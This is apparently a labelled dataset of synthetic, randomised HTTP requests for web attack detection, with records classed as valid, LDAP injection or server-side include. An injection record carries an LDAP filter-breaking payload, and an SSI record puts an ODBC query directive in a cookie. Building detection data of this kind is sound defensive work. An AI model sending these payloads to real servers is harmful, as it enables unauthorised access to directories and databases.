Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: lO4i-Dqehjyac;q=0.8, aN-uteat;q=0.6, akinba-nqee2d;q=0.1, wastiihu-rw2dbsfT;q=0.6
Cache-Control: no-cache
Client-ip: 192.222.7.79
Cookie: Fky2=31434755;cmeyl6=0103
Cookie2: $Version="9"
Date: Sat, 30 Sep 06 10:53:01 GMT
ETag: W/"IymFYVmxtdQB5r@C"
Expect: hmnh=etdd1c;h5o5s=hHorsh
From: ntiov@cuiYsate.org
If-Modified-Since: Sun, 23 Sep 07 23:58:08 CET
If-Unmodified-Since: Wed, 01 Oct 08 14:31:56 GMT
If-Match: *
If-None-Match: "RHkHGAtTdVoNMOm"
If-Range: Wed, 04 Nov 09 03:21:43 UTC
Max-Forwards: 767
MIME-Version: 8.7
Pragma: a2nr='2uG'
Proxy-Authorization: Basic dDdpZTpXMG9lc2VvZA==
Authorization: 6ncc wNIf=rils
Range: 65856-187
Referer: http://www.Esdwts.be/oatois/3e4dtoep/uuglf/SeO5/wnruE.sh
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.3 (Machintosh; U; PPC 7.4; 9t-qc; rv:4.2.7) Gecko/50136166
UA-CPU: 68000
UA-Disp: 3478,401,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3585x2586
Via: HTTP/1.2 128.20.23.226, HTTP/2.0 www.looaet.html, FTP/8.9 www.jncd.gif
Transfer-Encoding: mortw
Upgrade: evr/0.8, eendoi/2.0, ahl/7.0, tirUw/6.8
Warning: 857 www.weac.gif "Cdlyhd" 
X-Forwarded-For: 14.236.62.116
X-Serial-Number: 046539438868930
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11637
Start - Id: 24935
class: Valid
GET /8kxodIQu7fZiKT/n5r4R546IFyn/ntfaen/hoj/lk4/tgztzetcrrijnur/zQe0W4XZOCymphs8OMAq.tiff?aydZish8Pia=0&tmefeueeid=sa%5D&ltVYrmJM9=u%7E%40A&qnLS2=uaksa&odnetnevunaEsm=%5D%5Dh%2Bc4&rCoeoShn=Rdg5dnu5sf7wWtdd&SY9_l99GEB=4611504657&egrbE=a&U6g5G.=26042&sD=%26n%245oem&H64mgqlsieti=9&xyrrEeoofoNqi=eI7E64Y&9t27U-K9V=oigg HTTP/1.0
Host: www.Eioenahnec.net
Connection: nmolgs
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale=94481
Client-ip: 220.132.178.127
Cookie: lphps.optUJ=8;stdinpassthruJxjQoDmTrz=hMkW;kooRe3sfonset=0pDck6w64N;enhl=68
Cookie2: $Version="53"
Date: Tue, 27 Jan 04 14:15:53 GMT
ETag: W/"h2Xmy5GCd4Wj_v4L6-3"
Expect: dyoutIa=Ahaai
From: pwmfp9h@tptOa1oce.de
If-Modified-Since: Mon, 17 Sep 07 24:57:45 GMT
If-Unmodified-Since: Sat, 23 Dec 06 08:39:51 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 129
MIME-Version: 7.4
Pragma: ecay5Rwa=wtihuacw
Proxy-Authorization: fir8i hie6oar=onheeas
Authorization: Basic MTNJcTpOTHNp
Range: -47448,86125-296,-084
Referer: http://iv6sit9.it/l9r2hin/emohifA/boonet/nahit/glrrha.tar.gz
TE: trailers,deflate,deflate
Trailer: If-Range
User-Agent: lf4Xep0Yir (aASmx-bv; 7iD.lp_DG; 3q5WCW; aQPsRs-eeW; hA@mGCR)
UA-CPU: PowerPC
UA-Disp: 899,4850,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 031x428
Via: coaszs/6.5 29.242.20.72, 7.2 53.84.170.216, 8.7 www.gi9eqb.png
Transfer-Encoding: compress
Upgrade: hh2/5.5, 9Isobf/6.4, eFop/9.6, Olsl1/2.0
Warning: 612 www.dskecR.jpg:8674 "r2eeilfhshdeecbm" 
X-Forwarded-For: 38.96.136.60
X-Serial-Number: 2466804840974150
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24935
Start - Id: 17665
class: Valid
GET /Ugx3WnV/nkcmdaccess_logvX/dpoo/36PROjBRQdD6/kBcvoUfscriptD/iH8varItmj/1bgZ.cfm?z-_R6XAW=da9je&mszhnxyotme=A+%3Carsan%29+link0aehhyae&lah0epnsd=1Zgnn&rG=0eadmine&EapgrpaaTolep=93htpasschildiyWneO%299np&ai=924&metajMfAhttpsb1=cqn1o8eswzluu HTTP/1.0
Host: 58.7.150.195
Connection: Y9an
Accept: text/*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: bl-4LeS, wooZo-o, dls-tttdri;q=0.4, s3btex-ho;q=0.5
Cache-Control: no-store
Client-ip: 230.206.198.120
Cookie: 8toS3aEs5ecd=n%m etc%
Cookie2: $Version="003"
Date: Mon, 05 Mar 07 01:40:31 UTC
ETag: "w3D25KVVt4PU3k45y0kF"
Expect: 100-continue
From: ham2@rhhtcs.de
If-Modified-Since: Tue, 30 Sep 08 12:49:10 CET
If-Unmodified-Since: Sun, 14 Jun 09 18:25:10 GMT
If-Match: "5NjIRYjJ6Vi3Ovv"
If-None-Match: "wSj-fZGhYh3yDtNrJvfI"
If-Range: Mon, 20 Dec 04 11:55:58 GMT
Max-Forwards: 44
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM c3RkdWdlYXJyeGhPbnRrbHlpZmllbWQ4Ym9HbnUwZWxlcm9pZWVvZVRy
Authorization: eihw 0erb=eebdTn
Range: 7-,-84952
Referer: http://dt9im0.it/cntihma/1tkj/3awhste/hCnie.php4
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.0 (compatible; Konqueror/0.7; WinNT; hxtnd)
UA-CPU: Sparc
UA-Disp: 3353,591,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 813x197
Via: HTTP/6.0 www.eprreIcs.jpg
Transfer-Encoding: E8ese; smln5ei=z5R8lv
Upgrade: sroe/0.2, 5nn3e/7.9, hetla/5.6
Warning: 288 51.112.234.217 "feiedSegcNUchAneon2h" "Thu, 19 Feb 09 11:59:33 UTC"
X-Forwarded-For: 255.19.115.5
X-Serial-Number: 6572400
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 17665
Start - Id: 22827
class: Valid
GET /n0i7ZYqiu4Er_/pa_vf@ACrCv/etxheaogldeM/8T5tKYSoZOXTfJc/banaicit/tuezq4YfW/@httpsYg.tg/e5B/lyf57aiordun/bwpsGcQY.tiff?SEs7nrfpepnoemi=3204252&nnaSahq=4823524&vwlnFFienz=9&oeRdJ7npuoo=boot.ini&egefo5mmriNop=7620&mtb6tierrriymZ=fbgt2st3lr&4usue=gvlrennMziateph6Nr&tEsTrsttkn=7941&71=o6&mpni=+r HTTP/1.1
Host: www.shzxed.it:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 37.79.49.124
Cookie: Dx@LIP97mVa=bscript$aem4es
Cookie2: $Version="00"
Date: Thu, 19 May 05 05:21:52 UTC
ETag: W/"gf6NBL6mXaop@w9Bi9"
Expect: 100-continue
From: ea3t@i3OhaEidC.uk
If-Modified-Since: Fri, 30 Oct 09 04:53:08 UTC
If-Unmodified-Since: Thu, 15 Sep 05 07:13:04 UTC
If-Match: *
If-None-Match: "pj0oFF.VHtECLuh3kM"
If-Range: Fri, 28 Sep 07 11:12:47 GMT
Max-Forwards: 400
MIME-Version: 0.0
Pragma: sael='ul4'
Proxy-Authorization: NTLM YXNucmlkZW5uaXJuaGNzcGVuZHM5c29zZW1ycmVlZXVpb2RJck5hdHU1cjJpRQ==
Authorization: Tssty t9drg=itaysq
Range: 1016-,1-936,-4477
Referer: http://hheir.com/rvas/7ciun/Stlesehx.png
TE: deflate;q=0.7,trailers,gzip;q=0.7
Trailer: Upgrade
User-Agent: s4G22EJ2 http://www.EcrXsha.cz
UA-CPU: 68000
UA-Disp: 272,8020,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0384x569
Via: 7.0 www.ieem1hhe.shtml
Transfer-Encoding: gzip
Upgrade: Naw/1.9
Warning: 474 www.urLt.html "oPensm" "Thu, 17 Jul 08 17:25:25 GMT"
X-Forwarded-For: 207.142.89.78
X-Serial-Number: 8712140
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22827
Start - Id: 26240
class: Valid
GET /hsZiHuUa.4ar2XN/l.0pNh/w4t9QF8Wu/2NHDk/nneeeookal2ih/1DxszrYgiCcyrw2GY.css?wiymeutheto=eSnvn7i&dnro=group+by7to3%277gL&trioIg=opy3Tbjtb HTTP/1.1
Host: 25.145.176.65
Connection: itnT
Accept: application/*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: rstnnY-l;q=0.8, amr-peh5fhji;q=0.1, eh-5tbiaaG, ftC7knto-tdwht;q=0.5, segvfo-Itfrlab
Cache-Control: max-age=307
Client-ip: 196.161.77.5
Cookie: vihm=lsi+;tu=t@QKO
Cookie2: $Version="197"
Date: Sun, 21 Mar 10 16:15:03 CET
ETag: "n-GG_NG.sLOr5AFW"
Expect: 100-continue
From: scire@l29NotOrdn.be
If-Modified-Since: Sun, 28 Mar 10 10:51:08 UTC
If-Unmodified-Since: Sat, 11 Oct 08 20:24:39 CET
If-Match: "lZjU5I.LK@HWnlPy_"
If-None-Match: *
If-Range: Sat, 23 Sep 06 10:19:43 UTC
Max-Forwards: 8029
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest uri=http://ismiws.org/bltnhue/eeeeezo.gif
Authorization: hlncRl atr6=enhho
Range: 47781-
Referer: http://elhnsnes.ch/rpnZjt/oiss.png
TE: trailers,gzip;q=0.4
Trailer: Warning
User-Agent: Mozilla/6.5 (X11; U; Linux i586 3.0; uk-Nn; rv:5.2.4) Gecko/99321883
UA-CPU: PowerPC
UA-Disp: 9474,169,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 539x1733
Via: 7.1 www.hete.css, hdump/7.2 190.139.217.190, FTP/1.2 239.243.161.242
Transfer-Encoding: deflate
Upgrade: geoaa/5.5, tnh/2.0, wawlno/4.1
Warning: 942 www.roe5.js "9fTnaE3ws2" 
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 4037485153
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26240
Start - Id: 34772
class: Valid
PUT /c0ZDFItyyjc/bC.DWS/wShtpassjv_Tk3/phcnemtrdieirnql/ehaeZth8rkCh/0W@tQFufSz8.png? HTTP/1.1
Content-Length: 202
Content-Language: nhzR,she,Riffweon
Content-Encoding: deflate
Content-Location: /shguts.jsp
Content-MD5: YWZlcmRhYWVkb2VlM3RuaA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Oct 09 09:08:02 GMT
Last-Modified: Sat, 12 Dec 09 03:47:02 GMT
Host: www.igsbh.ch
Connection: close
Accept: application/*;q=0.7
Accept-Charset: hz-gb-2312, windows-1254;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 100.1.231.182
Cookie: swo=icaet;roLohueET=7636777;ftlbdnlotteHdnf=9;rdidceohi6e=oo;uu0hays8hete=RTotmeH;trzpeedufea9l=4005908
Cookie2: $Version="20"
Date: Fri, 03 Jun 05 21:03:30 UTC
ETag: "1vKuQnBhTCfQ8PE"
Expect: rnuaet
From: 4nxqdb@y0cwsr.uk
If-Modified-Since: Sat, 25 Jul 09 07:20:35 CET
If-Unmodified-Since: Thu, 02 Sep 04 11:21:34 CET
If-Match: "N8PIPLjQZU1FRaFS@T"
If-None-Match: "J8RPge7vsKnwIZ2G3U1S"
If-Range: Tue, 22 Jan 08 22:18:18 UTC
Max-Forwards: 3607
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: sssem eiteh9=s7a8xhej
Authorization: NTLM d2l0aW9zYm9xbW9sbW1tMHVmc3V0c2VlYXJzZmUzbGhvYU5zMmlkbmV6YWdh
Range: 40725-825,171943-,0918-722285
Referer: http://www.YdaTb.de/xnaihtgs.exe
TE: deflate,gzip;q=0.7
Trailer: Accept
User-Agent: Hseimerf (udx@@m)
UA-CPU: MIPS
UA-Disp: 456,5311,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 262x4505
Via: 3.5 www.anee.gif, FTP/4.5 www.aoijhTsn.tiff
Transfer-Encoding: identity
Upgrade: Zem/1.3, pcRSe/9.2
Warning: 563 www.oSibytw.htm "7HeelDne" 
X-Forwarded-For: 59.6.197.154
X-Serial-Number: 438515700357527
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

JCHiikj4Lxml=631615&wl0bilef= locationceuti 3y&inazpomot==&brgfilr=511&aPsuTbtce=hcluji&eassdaw=pokatzieldne)y4&tfeUrsbrEaeu=t0sCQmVcVEE&aolseru=hbVBL&icoistoa=baoi&inqEkm=einsertw&h7tyoeava1en=cf1o

End - Id: 34772
Start - Id: 24206
class: Valid
GET /hoas/CMaaQ@kFselect5_e/un/vadminhe11KF@v.hRKW/peeengopwwta/soqC9zUF8on8qrdn/LhNCopttfwget/2b/kWCR9W.O6b@cEsj.js?xcirzAadvuqyee=oie&C3Lheetnnetspef=%3Fe%5C%3Eeqto4ysnec+ld2o&i1aurEnx=stdindps+i&daugnleE=a%27Dszs%26&GbSNR5Vx=030&z2=7&wE4u=iuN3&ee3lNzteae=26i&telnet8T0DAtFFrTJ=8405019&bormin=bazscript HTTP/1.0
Host: www.l5epo8mss.gov
Connection: close
Accept: application/*;q=0.4, application/*, image/*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: 7rArS1-he0oe, necirfe-9;q=0.5, wrscp-oh, ywaI-2ur4apOa, eHL-2efr9m
Cache-Control: max-stale=19237
Client-ip: 105.225.30.248
Cookie: tosplocdDm=e@eo;SQrrfOeeh7=ne7odelete;5I4inJE4='9dln
Cookie2: $Version="564"
Date: Sat, 10 Sep 05 13:35:45 UTC
ETag: W/"d4RMo3ppA5gVFGw"
Expect: 100-continue
From: vktxen@eejuti.biz
If-Modified-Since: Fri, 10 Dec 04 17:37:54 UTC
If-Unmodified-Since: Thu, 23 Dec 04 20:51:09 UTC
If-Match: "4O8FqBDmxy.KEHob"
If-None-Match: *
If-Range: Sun, 02 Nov 08 02:42:58 GMT
Max-Forwards: 371
MIME-Version: 5.0
Pragma: a2='nofkenT'
Proxy-Authorization: Iccdm brwetH=oa0t
Authorization: NTLM ZVNybmxydGNidG90bFRUZ2FsbmEybm9lZTZvN2VzemVyYTJ0dnU=
Range: 497-0048,6-
Referer: http://www.taboTol.be/rttndl/uesH/7rae.tar
TE: gzip;q=0.3
Trailer: Warning
User-Agent: tyeyms (coIly@CC; nm0O5eh; tYz1X@)
UA-CPU: MIPS
UA-Disp: 7755,8327,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 146x610
Via: FTP/0.0 101.162.88.118, FTP/0.2 142.39.65.104:012
Transfer-Encoding: deflate
Upgrade: syof/8.8, rsea/3.0, gel/1.4
Warning: 155 147.225.115.94 "lnnt" 
X-Forwarded-For: 254.110.118.39
X-Serial-Number: 42275938447231485
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24206
Start - Id: 11386
class: Valid
GET /egZoTbbLfH_X8Db/d_n9bJCkOPVK1U/echo7nonAboot.ini/aJkgCeCK5l1z4yKwfD/dm/h2zeoo.php3?eigmnuebstaot=bL9FU82OGRc&eserreunnm=e-gkom&X8MZZsOAM=%40&ouvatpt8dfAdcte=Deabtoi2IiKms&eoI=eni4u%7Ehtpassnrgij4&4qTtyaateeRi=oTgom+ttgco&egiogroir=7940&netatmoEi1ra=iceh HTTP/1.0
Host: 11.121.82.202
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: eptoeh-z4ipeRa;q=0.7, 9t-ttirmo, 4eEr-aUf;q=0.1, eoto-fho;q=0.1
Cache-Control: no-store
Client-ip: 35.207.43.172
Cookie: Y4@TVgroup byPh=nF2jpreabeepoRhot;BCMYEpositionNXgex=nhfoeuHrhtAtrmTdm;rtjleHe1oe1r=09936051;EMecho6=pcmL
Cookie2: $Version="55"
Date: Tue, 31 Mar 09 16:52:43 GMT
ETag: "PHNBhJKnT@z5_di"
Expect: lzkec
From: snso@neess.uk
If-Modified-Since: Fri, 26 Sep 08 08:44:40 CET
If-Unmodified-Since: Fri, 31 Jul 09 23:40:19 GMT
If-Match: "L0nFTa@nF7Vv-0-2y"
If-None-Match: *
If-Range: Thu, 10 Jul 08 14:06:37 GMT
Max-Forwards: 51
MIME-Version: 4.6
Pragma: hsa='l'
Proxy-Authorization: NTLM bnc2bzNrTndFZGE0aW94cm5zZk5nNGVhZWV0aHB0c2xyb29qb3lhMg==
Authorization: NTLM MG9hRXd5ZWx4b1NDa1EwaGlpZWVsbm13T05manNnbmVlbml2ejNraHpseHNybmc=
Range: 457-40
Referer: /Lner/oar4aed/Qoot2/aiwccy/aneonP.pl
TE: deflate
Trailer: Accept
User-Agent: Mozilla/1.8 (compatible; MSIE 1.8; Solaris; jltakd)
UA-CPU: Sparc
UA-Disp: 299,1774,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 1359x6283
Via: 0.5 202.32.168.39, 3.6 132.201.171.218
Transfer-Encoding: identity
Upgrade: r39rn/5.6, eeophz/8.8, 1tanom/6.3, joGerm/3.2, oStM/2.6
Warning: 549 54.14.146.24 "veiinschlftang5nhhmr" 
X-Forwarded-For: 119.251.177.187
X-Serial-Number: 44542965247814892
----: -----------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 11386
Start - Id: 38286
class: LdapInjection
GET /9tw66tdfAdirex/tiy1r5mos7ts3/eOrdeiffitj/40nbOk/lYTPA_f/hezIDtMkXlQ/enOtue/JEo-amochat/4c/e.bDWOxY9@KpTDf/2VACXopt-.html?ihsate=thto%29%28%26%28objectClass++++%3Dpn*%29&jsam2FTz=fmetfN&ije8Snidnsce2=2653654&t7eknn8=rv1Vh&jh=9&GB2G4qeval=eiddpnapeus&twcladap5nnt=accept&ts9eetbcukUHpdt=oaw4MT%40kMiy_&nyP.7gui_596=rrh&_UYoSJkOjFnB=4127&nfyzstd7ropeml=iryo&hnyjsP6Tgeibbi=gtrtouftial7s%7C+&cmdTAJZ=8&e6atstic9taenn=qbm&eohuane8ue7e=0h HTTP/1.0
Host: www.0etds.it:3
Connection: uers
Accept: text/*, image/gif;q=0.0
Accept-Charset: iso-8859-8-i
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 166.82.60.199
Cookie: ghysawinmg=7;roC2om-7mBn.=6xGUa;illHaiduyhyamat=t?ri;ok5ro1t7esGv=8nE;a0yAd=hbij0e0ew7Oe7rsiap
Cookie2: $Version="80"
Date: Tue, 22 Jun 04 10:42:26 CET
ETag: W/"Bq3JVGm2RGFCrlvj"
Expect: 100-continue
From: deosTn4@ntarwtzGa.ch
If-Modified-Since: Fri, 04 Apr 08 05:16:45 GMT
If-Unmodified-Since: Sun, 11 Jan 09 18:28:48 UTC
If-Match: "ET@jdlgsXoHJHvB"
If-None-Match: "6-q2N90f9zcQjfY"
If-Range: *
Max-Forwards: 9068
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest username="mscm"
Authorization: sbs8as toert=tVya
Range: 339-28315
Referer: http://dqory4c.gov/aacomk/tnrqd.swf
TE: deflate,deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.8 (compatible; Uaxilerr; Linux i586; 0amtta; eesendt)
UA-CPU: MIPS
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 205x286
Via: 5.1 96.74.31.247, 6.3 www.OYhmh.js, 2.2 www.Fwenpd.html
Transfer-Encoding: 9MOLse
Upgrade: segoo/3.8
Warning: 319 133.132.138.49 "aLcsnAauiahn" 
X-Forwarded-For: 20.129.147.18
X-Serial-Number: 055236562928
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 38286
Start - Id: 13663
class: Valid
GET /hh/-5p2Yin3@_/rsxgDiCZ9rp/egphrLyN7Pt@6H/tlmo3ztsrs/ofxubgHPHyy_-_3@6.gif?gudxBasotu=sb2op0m&ru=971&rdB2gerrc4=lexecR2cgroup+byhome1ts2%3Bse HTTP/1.0
Host: www.ui5Ycrl.gov
Connection: lnTl1o
Accept: audio/*;q=0.4, application/rtf;q=0.0
Accept-Charset: iso-8859-2;q=0.0, x-mac-ce;q=0.9, x-mac-arabic;q=0.8, windows-1253;q=0.6
Accept-Encoding: gzip, compress, gzip, deflate;q=0.6
Accept-Language: *;q=0.9
Cache-Control: max-age=3
Client-ip: 148.192.91.169
Cookie: eogpsoadgciy1l=611332;ov8s=6488335;PvnWxp_7S@VwY=hgenhurd;0rateynEEle=s
Cookie2: $Version="69"
Date: Wed, 13 Feb 08 17:24:05 CET
ETag: W/"wGs-xm7PtKbW5.cC"
Expect: 100-continue
From: 2uses@EiiTw.cz
If-Modified-Since: Tue, 04 May 10 21:37:08 GMT
If-Unmodified-Since: Sun, 07 Nov 04 23:43:53 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6959
MIME-Version: 9.6
Pragma: 6e='u'
Proxy-Authorization: Digest cnonce="eLtokse"
Authorization: NTLM d25vcjlvd3JocnNkVGNzUGhpZXNzcGRyckVvU3Rkbjg=
Range: 2-901367
Referer: /ovxT.jsp
TE: chunked;q=0.8,trailers
Trailer: User-Agent
User-Agent: npSm5idbap/8.0.6.9
UA-CPU: StrongARM
UA-Disp: 0718,4997,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 747x4906
Via: 2.6 www.Taiko1ee.html, 6.4 40.154.60.138:0
Transfer-Encoding: deflate
Upgrade: yfg/1.7, sAr/9.1
Warning: 810 233.40.240.2:75910 "hppilonufanrr5o" "Tue, 05 Oct 04 06:33:59 UTC"
X-Forwarded-For: 43.38.172.20
X-Serial-Number: 02500062912801761
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13663
Start - Id: 40749
class: SSI
GET /wS57d0_4qOAO/lcpnrd/3b3I3mhmvHJI4n/wtsp8e0dro.js?zlephTo19grst=037982461&iosr5twrtc=erewCbSutAuyuahu&D0=zry&mtt=n&jafda5ant=ewsa09loftuv5lppxl&eor9=asystem%7EWperlrets%24oai&zwG9SgOzY=9&h9=sTi99M8ovq&to2dahtayiocyi=070 HTTP/1.0
Host: 57.214.102.242
Connection: close
Accept: text/html, text/plain, application/zip;q=0.6
Accept-Charset: us-ascii
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=5
Cookie: yfwDcxtmsoa=<!--   #odbc    connect="wBCtulj,Kt,7eue"     statement="select  *  from n"-->
Cookie2: $Version="228"
Date: Fri, 22 Jun 07 09:37:18 GMT
Expect: 100-continue
If-Unmodified-Since: Sun, 10 Jun 07 22:15:23 UTC
Max-Forwards: 6913
Proxy-Authorization: Basic bzNvUmFlVzozZWhkbg==
Referer: /soobmh/7aqA/chepo.wav
User-Agent: Mozilla/9.3 (X11; U; Unix 1.3; nt-tb; rv:1.9.3) Gecko/59623112
Transfer-Encoding: gzip

null

End - Id: 40749
Start - Id: 24242
class: Valid
GET /esdRj/oec7lkrrEwa7aed/aais2wnkotehric3/rNDdAILQEGBFuW7zR6/ianoarso3geaneDtch/napzZ2WANS/s@DzIODVUfbK/stnwos5ruceoecpnytLe/CHL-7U@_1ftpqc.jpeg?bodadr=+aOiy7bsfahi%40fS&42p=387&n2JevDDY@X=rmait&ixltegisjod=glMYQCc2pj&hg1Pwe=188685&wvmxn=heH-_50C7&1ra=euEnn&cluoy=nscript7%3Bt4eirn-awd17 HTTP/1.1
Host: www.ntereT2mo.st:80
Connection: auaev
Accept: audio/*, image/jpeg, image/*
Accept-Charset: koi8-r, windows-1258, windows-1252;q=0.7
Accept-Encoding: gzip;q=0.2, identity, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 2.195.25.113
Cookie: hE8alsr=2050;atmcleey=1757311;HRr_H=)tsnetcatho\efRisn0fi2rA;hsean=95
Cookie2: $Version="43"
Date: Mon, 30 Apr 07 10:17:45 CET
ETag: "m46IDxIT8aNSHAg@k7do"
Expect: 100-continue
From: rs7Gcl@tgiieFnw.gov
If-Modified-Since: Fri, 17 Sep 04 02:10:09 CET
If-Unmodified-Since: Wed, 29 Dec 04 18:14:49 GMT
If-Match: *
If-None-Match: "ndMphUyDlYnaPXxM"
If-Range: Mon, 14 Jun 04 21:20:14 CET
Max-Forwards: 4
MIME-Version: 8.1
Pragma: cbd2ie='vnBsii'
Proxy-Authorization: Basic Z0FFZFRuOm5hZW5laA==
Authorization: Basic bTE4ZzphZXdlaA==
Range: 8342-,-03829
Referer: http://thtP0se.st/sisota/3uaseA0/aeoe/Intkurrq/IS8l.php3
TE: deflate;q=0.0
Trailer: Accept-Charset
User-Agent: Mozilla/3.1 (Machintosh; U; Mac OS X 2.7; uh-ia; rv:0.6.2) Gecko/94270421
UA-CPU: StrongARM
UA-Disp: 565,7828,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 982x566
Via: FTP/6.1 www.hieldnoe.jpeg, 7.6 147.206.153.14
Transfer-Encoding: deflate
Upgrade: nmsBw/3.6
Warning: 335 157.183.177.154 "buOrqedamsso" "Thu, 14 Apr 05 06:20:30 GMT"
X-Forwarded-For: 232.243.28.45
X-Serial-Number: 58849092
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24242
Start - Id: 6052
class: Valid
POST /svx/0noo0an/hfdu71rtoey/h91K0Lk-.mspx? HTTP/1.0
Content-Length: 112
Content-Language: hAaa,TaoEt
Content-Encoding: gzip
Content-Location: /iUueep/ehe4o/ilwm/htosljeE.gz
Content-MD5: RWlvMk5ubFRxZ3QzaXV0bg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 30 Apr 05 10:47:59 CET
Last-Modified: Sun, 21 Feb 10 22:31:06 UTC
Host: 204.250.90.104
Connection: 5foh9o
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-age=77557
Client-ip: 149.87.24.213
Cookie: lce=bRZla6FsLeT;nexeehatro3clo=nnh yv
Cookie2: $Version="9"
Date: Tue, 12 May 09 15:09:49 GMT
ETag: "SjEeyX-@H-Z3ImFQTM9p"
Expect: 100-continue
From: tlbaw@voaoyodah.biz
If-Modified-Since: Sat, 19 Feb 05 01:24:25 CET
If-Unmodified-Since: Thu, 01 Sep 05 14:22:01 GMT
If-Match: "tjqbUZCpDq6GCkLuGTw8"
If-None-Match: "z3X@qxTl1oaiZxC"
If-Range: Wed, 06 Sep 06 01:46:26 UTC
Max-Forwards: 1827
MIME-Version: 3.9
Pragma: areocyiu='in'
Proxy-Authorization: IEaq ghnuWgnb=dheobaz4
Authorization: NTLM YW51Y3RlUHVoaGhsdGV5NXNoc3VnZW5mcmQ0YmVhZXJ0bkxtbmFIM09vYXVveXRl
Range: 95-
Referer: /0oodifot/euc5teu.php
TE: trailers,chunked;q=0.9
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.3 (compatible; MSIE 1.8; Solaris; tuoo; tntty)
UA-CPU: x86
UA-Disp: 7915,1148,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 311x5128
Via: 0.9 121.110.237.40
Transfer-Encoding: identity
Upgrade: has5y/4.3, eeohRn/1.7, ahe/4.9, isrias/0.3, tsayOs/5.2
Warning: 878 60.67.82.100 "uTte" "Tue, 19 Oct 04 04:40:48 CET"
X-Forwarded-For: 102.142.185.9
X-Serial-Number: 74978987947334907792
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

doG1hTT=ncj@@L4mAlZ&HJGautoexec=38931601&mjenot=11552&avsOhmhbagg=u3J&eonvTEg=9os]ttinyd&hao6mee5ee=i9HGBr

End - Id: 6052
Start - Id: 20780
class: Valid
GET /iVY7aMeE_evgU_MJtP/t7FyaUkJfWpvEsnxoth/uy5@Npaaz9o/43Onh/t5ushta1fgnbdHasl/uokaLecxgmboed/pIwnKGpSEahJvn/izpineh6RqoFVZtIJ/C7Lp@dLIr82accept5link/aCCizfe@QIr5FVQjSo.z/iIwx.tiff?pdnwdaetorte=nZ89W&hz8pj=6003&eHobZtd1sourr=663341&nsAbnuPnniyhdy=43&cRauA=renn&ZDfnoderBP81@Vu=858&XPG0Al=084867111&EabodyNaccess_logoHtmpMO.7=nsecEsef2t&aoiAo=n2hq6f1yOD&i6a=az_&phpe4_TWinputi5Sq=ti&gtjyesoisq=isri&25eyseUlqd=590461 HTTP/1.0
Host: 186.99.190.39:80
Connection: aneStib
Accept: application/*;q=0.5, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 145.106.245.168
Cookie: imgmpMformydvQPim=dexec;tbrnunhn=0739451704
Cookie2: $Version="001"
Date: Wed, 03 Aug 05 19:51:02 UTC
ETag: W/"L3YjBHgs1M8e2DeRG"
Expect: Reeyl
From: txeT@aevntoegn.com
If-Modified-Since: Wed, 23 Nov 05 11:26:36 GMT
If-Unmodified-Since: Mon, 30 Oct 06 09:05:49 GMT
If-Match: *
